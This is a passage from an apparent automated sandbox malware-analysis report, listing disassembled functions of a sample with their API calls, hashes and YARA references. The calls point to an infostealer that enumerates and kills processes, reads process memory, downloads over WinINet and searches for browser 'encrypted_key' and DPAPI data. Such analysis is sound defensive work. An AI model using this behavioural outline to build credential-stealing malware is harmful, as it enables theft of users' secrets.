                                                    • API ID: Internet$CloseHandle$FileOpenReadmemchr$Xinvalid_argumentmemcmpstd::_strlen
                                                    • String ID:
                                                    • API String ID: 1093921401-0
                                                    • Opcode ID: 2df68befe2a48d953af9806ad3ef1aaa75e141ea7b2b3915444889022231d2c0
                                                    • Instruction ID: ca02488f5bf2fc89a0f6a408bc624c6e44ae974f29a7809d8d63ac3f7a2036c8
                                                    • Opcode Fuzzy Hash: 2df68befe2a48d953af9806ad3ef1aaa75e141ea7b2b3915444889022231d2c0
                                                    • Instruction Fuzzy Hash: F551D471A00204ABDB20DFA8DC45FEEF7F9DB48714F14012AE505E3380DBB4DA459BA5
                                                    Function 00424760 Relevance: 12.1, APIs: 8, Instructions: 52processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00424779
                                                    • Process32First.KERNEL32(00000000,00000128), ref: 00424789
                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 0042479B
                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004247BC
                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 004247CB
                                                    • CloseHandle.KERNEL32(00000000), ref: 004247D2
                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 004247E0
                                                    • CloseHandle.KERNEL32(00000000), ref: 004247EB
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                                    • String ID:
                                                    • API String ID: 3836391474-0
                                                    • Opcode ID: 52672e04caeec890ace4a1d791050bff1080cdcf40c9c1db2d30368871fa3206
                                                    • Instruction ID: 367f00e3fac1ad323777d3cfb6a9c31bedb6582ea87d99118442d47bc1b8c7be
                                                    • Opcode Fuzzy Hash: 52672e04caeec890ace4a1d791050bff1080cdcf40c9c1db2d30368871fa3206
                                                    • Instruction Fuzzy Hash: 65019271701224AFE7215B30ACC9FEB777DEB88751F00119AF905D2290EFB48D908AA4
                                                    Function 0248E756 Relevance: 10.9, APIs: 7, Instructions: 442stringfileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0248EB2A
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0248EB5C
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0248EBAB
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0248EBD1
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0248EC09
                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 0248EC3F
                                                    • FindClose.KERNEL32(00000000), ref: 0248EC4E
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$Find$CloseFileNext
                                                    • String ID:
                                                    • API String ID: 1875835556-0
                                                    • Opcode ID: b5ed9969159fa0d82a6a01bf3dad53704cd6f8d5ac4c5590e0dbe1d416b39770
                                                    • Instruction ID: 42c41d695748a93f4e358332baf0f22026bd24576ae896dcd7984789a4d128ac
                                                    • Opcode Fuzzy Hash: b5ed9969159fa0d82a6a01bf3dad53704cd6f8d5ac4c5590e0dbe1d416b39770
                                                    • Instruction Fuzzy Hash: 5E02FD71B212128FDB28DF19C548B6AB7E5AF44718F19C1AEE809DB3A1D772D842CF50
                                                    Function 0248E7DB Relevance: 10.9, APIs: 7, Instructions: 442stringfileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0248EB2A
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0248EB5C
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0248EBAB
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0248EBD1
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0248EC09
                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 0248EC3F
                                                    • FindClose.KERNEL32(00000000), ref: 0248EC4E
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$Find$CloseFileNext
                                                    • String ID:
                                                    • API String ID: 1875835556-0
                                                    • Opcode ID: b5ed9969159fa0d82a6a01bf3dad53704cd6f8d5ac4c5590e0dbe1d416b39770
                                                    • Instruction ID: 42c41d695748a93f4e358332baf0f22026bd24576ae896dcd7984789a4d128ac
                                                    • Opcode Fuzzy Hash: b5ed9969159fa0d82a6a01bf3dad53704cd6f8d5ac4c5590e0dbe1d416b39770
                                                    • Instruction Fuzzy Hash: 5E02FD71B212128FDB28DF19C548B6AB7E5AF44718F19C1AEE809DB3A1D772D842CF50
                                                    Function 0248E7FC Relevance: 10.9, APIs: 7, Instructions: 442stringfileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0248EB2A
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0248EB5C
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0248EBAB
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0248EBD1
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0248EC09
                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 0248EC3F
                                                    • FindClose.KERNEL32(00000000), ref: 0248EC4E
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$Find$CloseFileNext
                                                    • String ID:
                                                    • API String ID: 1875835556-0
                                                    • Opcode ID: b5ed9969159fa0d82a6a01bf3dad53704cd6f8d5ac4c5590e0dbe1d416b39770
                                                    • Instruction ID: 42c41d695748a93f4e358332baf0f22026bd24576ae896dcd7984789a4d128ac
                                                    • Opcode Fuzzy Hash: b5ed9969159fa0d82a6a01bf3dad53704cd6f8d5ac4c5590e0dbe1d416b39770
                                                    • Instruction Fuzzy Hash: 5E02FD71B212128FDB28DF19C548B6AB7E5AF44718F19C1AEE809DB3A1D772D842CF50
                                                    Function 024A2377 Relevance: 10.7, APIs: 7, Instructions: 224stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • strlen.MSVCRT ref: 024A238A
                                                    • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,024A2686,00000000,00000000,00000000), ref: 024A23B8
                                                    • VirtualQueryEx.KERNEL32(00000000,00000000,?,0000001C), ref: 024A2408
                                                    • ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00064000,00000000), ref: 024A2469
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MemoryProcessQueryReadVirtualstrlen
                                                    • String ID:
                                                    • API String ID: 3366127311-0
                                                    • Opcode ID: 237dd88af5c74adab4b13bca57ee1463c3df570b0aab9420e182108aa891172b
                                                    • Instruction ID: 9424dfa99a28cb65d3e70d117b6d576c28c3367395eff5b9523c842621dd606f
                                                    • Opcode Fuzzy Hash: 237dd88af5c74adab4b13bca57ee1463c3df570b0aab9420e182108aa891172b
                                                    • Instruction Fuzzy Hash: 3671E271A001199BDB24CFA8DD64AAFB7B6FB98710F14812AFD05E7380D774DD419BA0
                                                    Function 00407130 Relevance: 10.6, APIs: 7, Instructions: 141memorylibraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(?), ref: 0040717E
                                                    • GetProcessHeap.KERNEL32(00000008,00000010), ref: 004071B9
                                                    • HeapAlloc.KERNEL32(00000000), ref: 004071C0
                                                    • memcpy.MSVCRT(00000000,?), ref: 004071ED
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00407203
                                                    • HeapFree.KERNEL32(00000000), ref: 0040720A
                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00407269
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heap$Process$AddressAllocFreeLibraryLoadProcmemcpy
                                                    • String ID:
                                                    • API String ID: 1745114167-0
                                                    • Opcode ID: b8b6d1e05054ea07a43d014ff49ccb22529942b78b606a01fe6625217ee999e1
                                                    • Instruction ID: 12ab2d4fc661ad8143b60d879bbfd3a328605d63d86a8d422f2a9a3c01bded70
                                                    • Opcode Fuzzy Hash: b8b6d1e05054ea07a43d014ff49ccb22529942b78b606a01fe6625217ee999e1
                                                    • Instruction Fuzzy Hash: FE416D71B046059BD720CFA9DC84BAAB3E9FB84305F1445BEE849D7380E739E8508B65
                                                    Function 02487397 Relevance: 10.6, APIs: 7, Instructions: 141memorylibraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(?), ref: 024873E5
                                                    • GetProcessHeap.KERNEL32(00000008,00000010), ref: 02487420
                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02487427
                                                    • memcpy.MSVCRT(00000000,?), ref: 02487454
                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0248746A
                                                    • HeapFree.KERNEL32(00000000), ref: 02487471
                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 024874D0
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProcmemcpy
                                                    • String ID:
                                                    • API String ID: 413393563-0
                                                    • Opcode ID: b8b6d1e05054ea07a43d014ff49ccb22529942b78b606a01fe6625217ee999e1
                                                    • Instruction ID: f0c65cd217579a0264572e6c5cf3d8a51ceed3bbf1b467fd7017a3b8af5e8396
                                                    • Opcode Fuzzy Hash: b8b6d1e05054ea07a43d014ff49ccb22529942b78b606a01fe6625217ee999e1
                                                    • Instruction Fuzzy Hash: 92418E75B106059BD720DFA9EC947AAF7E9EB84309F2445AAE84DC7310E771E800CBA0
                                                    Function 00409CD0 Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 123memorystringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000), ref: 00409D08
                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00409D3A
                                                    • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D63
                                                    • memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D9C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocLocallstrcpymemcmp
                                                    • String ID: $"encrypted_key":"$DPAPI
                                                    • API String ID: 4154055062-738592651
                                                    • Opcode ID: d77c832db12349da7b30ba69df4ba2cf0c7857204c4570defeb58a77868b8b7c
                                                    • Instruction ID: 867cb166c61f41a869f23d409f67d1e1a1a1e3bdbbf69cd9a3e784fd9bca4893
                                                    • Opcode Fuzzy Hash: d77c832db12349da7b30ba69df4ba2cf0c7857204c4570defeb58a77868b8b7c
                                                    • Instruction Fuzzy Hash: 76418A71A0020A9BDB10EF65CD856AF77B5AF44308F04417AE954BB3E2DA78ED05CB98
                                                    Function 00417F60 Relevance: 10.6, APIs: 7, Instructions: 118stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • strtok_s.MSVCRT ref: 00417F84
                                                    • lstrlenA.KERNEL32(00000000), ref: 00417FB1
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00417FE0
                                                    • strtok_s.MSVCRT ref: 00417FF1
                                                    • StrCmpCA.SHLWAPI(00000000,00435204), ref: 00418025
                                                    • StrCmpCA.SHLWAPI(00000000,00435204), ref: 00418053
                                                    • StrCmpCA.SHLWAPI(00000000,00435204), ref: 00418087
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: strtok_s$lstrcpylstrlen
                                                    • String ID:
                                                    • API String ID: 348468850-0
                                                    • Opcode ID: 0c468244a8143168505cd9d6d1ab1f94799bd3f5708272a995eed29db236200c
                                                    • Instruction ID: 476cfacc260c43b9b6707cb97608d97a847e356c1d56728458ea849191fa1f26
                                                    • Opcode Fuzzy Hash: 0c468244a8143168505cd9d6d1ab1f94799bd3f5708272a995eed29db236200c
                                                    • Instruction Fuzzy Hash: D0417F34A0450ADFCB21DF18D884EEB77B4FF44304F12409AE805AB351DB79AAA6CF95
                                                    Function 02498347 Relevance: 10.6, APIs: 7, Instructions: 112stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • strtok_s.MSVCRT ref: 0249836C
                                                    • lstrlen.KERNEL32(00000000), ref: 024983B2
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024983E1
                                                    • StrCmpCA.SHLWAPI(00000000,00435204), ref: 024983F9
                                                    • lstrlen.KERNEL32(00000000), ref: 02498437
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02498466
                                                    • strtok_s.MSVCRT ref: 02498476
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpylstrlenstrtok_s
                                                    • String ID:
                                                    • API String ID: 3280532728-0
                                                    • Opcode ID: 43023dec0009249c1699197493f64402cd777fe6b66fe5db91421765cffb73b4
                                                    • Instruction ID: 87d07580f7f0fafca4152219f815aa45909065b9492f755a7f5328d8e7748008
                                                    • Opcode Fuzzy Hash: 43023dec0009249c1699197493f64402cd777fe6b66fe5db91421765cffb73b4
                                                    • Instruction Fuzzy Hash: FD4167716002069FDB21EF6CD988BAABBB5EF46704F00801EEC4A97245EB75D941CFA0
                                                    Function 024857D7 Relevance: 10.6, APIs: 7, Instructions: 112networkmemoryfileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 024857F0
                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 024857F7
                                                    • InternetOpenA.WININET(0042D01C,00000000,00000000,00000000,00000000), ref: 0248580D
                                                    • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,04000100,00000000), ref: 02485828
                                                    • InternetReadFile.WININET(?,?,00000400,00000001), ref: 02485853
                                                    • InternetCloseHandle.WININET(?), ref: 02485892
                                                    • InternetCloseHandle.WININET(00000000), ref: 02485899
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                                    • String ID:
                                                    • API String ID: 3066467675-0
                                                    • Opcode ID: 4b94f128dec9b096c0b0ad2455cc516de48ee45f6034d2c2602a7e5d6cf19bdb
                                                    • Instruction ID: 6892681158d36acd2f704ad99636c8af4466af256c37b0dc346e5b811b69bbd0
                                                    • Opcode Fuzzy Hash: 4b94f128dec9b096c0b0ad2455cc516de48ee45f6034d2c2602a7e5d6cf19bdb
                                                    • Instruction Fuzzy Hash: BB417E70A00204AFDB24DF59DC48B9EB7F5FF48314F5580AAE9099B3A0D7B1A941CF94
                                                    Function 024A4787 Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • memset.MSVCRT ref: 024A47A1
                                                    • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,?,?,0249558F), ref: 024A47CC
                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 024A47D3
                                                    • wsprintfW.USER32 ref: 024A47E2
                                                    • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 024A4851
                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 024A4860
                                                    • CloseHandle.KERNEL32(00000000,?,?), ref: 024A4867
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                                    • String ID:
                                                    • API String ID: 3729781310-0
                                                    • Opcode ID: f294a9282a179aaf91779889443061928891274dba70d803f1520c29df2745ed
                                                    • Instruction ID: fed3be049fa0549b6760c456ece26fa85a7a9ea14118540c800866eb32e70ebf
                                                    • Opcode Fuzzy Hash: f294a9282a179aaf91779889443061928891274dba70d803f1520c29df2745ed
                                                    • Instruction Fuzzy Hash: 4F316F75A00245BBDB20DFA5DC89FDEB779AF44741F104059FA05E7180DBB0A6418BA5
                                                    Function 00417DC0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 93COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 00417DD8
                                                      • Part of subcall function 0042A1F0: std::exception::exception.LIBCMT ref: 0042A205
                                                      • Part of subcall function 0042A1F0: __CxxThrowException@8.LIBCMT ref: 0042A21A
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 00417DF6
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 00417E11
                                                    • memcpy.MSVCRT(?,?,?,00000000,?,?,00417CFA,00000000,?,?,00000000,?,004091B6,?), ref: 00417E74
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Xinvalid_argumentstd::_$Exception@8Throwmemcpystd::exception::exception
                                                    • String ID: invalid string position$string too long
                                                    • API String ID: 702443124-4289949731
                                                    • Opcode ID: f8e74443709f6fd1f3a4696463b8f0e4265ac4588280398e2d67d3aa4e5e97cf
                                                    • Instruction ID: 79f032b162a4ed5f1b8d8c3a7f5ff0854d2ec62b836a1cb7fb32b648417a52a7
                                                    • Opcode Fuzzy Hash: f8e74443709f6fd1f3a4696463b8f0e4265ac4588280398e2d67d3aa4e5e97cf
                                                    • Instruction Fuzzy Hash: 5921C3323047008BD7249E2CE980B6AB7F5AF95720F604A6FF4968B381D775DC8187A9
                                                    Function 00408880 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 89COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 004088B3
                                                      • Part of subcall function 0042A1A3: std::exception::exception.LIBCMT ref: 0042A1B8
                                                      • Part of subcall function 0042A1A3: __CxxThrowException@8.LIBCMT ref: 0042A1CD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
